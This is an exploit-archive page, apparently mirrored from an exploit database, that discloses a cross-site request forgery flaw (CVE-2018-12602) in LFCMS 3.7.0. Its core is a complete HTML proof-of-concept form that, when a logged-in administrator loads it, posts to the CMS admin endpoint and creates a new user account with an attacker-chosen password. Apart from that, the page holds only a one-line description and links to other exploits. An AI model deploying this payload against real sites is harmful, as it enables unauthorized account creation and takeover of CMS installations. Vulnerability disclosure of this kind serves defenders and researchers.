Lfcms 3.7.0 crosssite request forgery (add user) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-06-21 | Type : webapps | Platform : php
This exploit / vulnerability Lfcms 3.7.0 crosssite request forgery (add user) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
# Date: 2018-06-20
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12602


A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.


The payload for attack is as follows.


<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
<input type="hidden" name="username" value="test222" />
<input type="hidden" name="email" value="test2@qq.com" />
<input type="hidden" name="password" value="test222" />
<input type="hidden" name="repassword" value="test222" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Lfcms 3.7.0 crosssite request forgery (add user)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Lfcms 3.7.0 crosssite request forgery (add user) Vulnerability / Exploit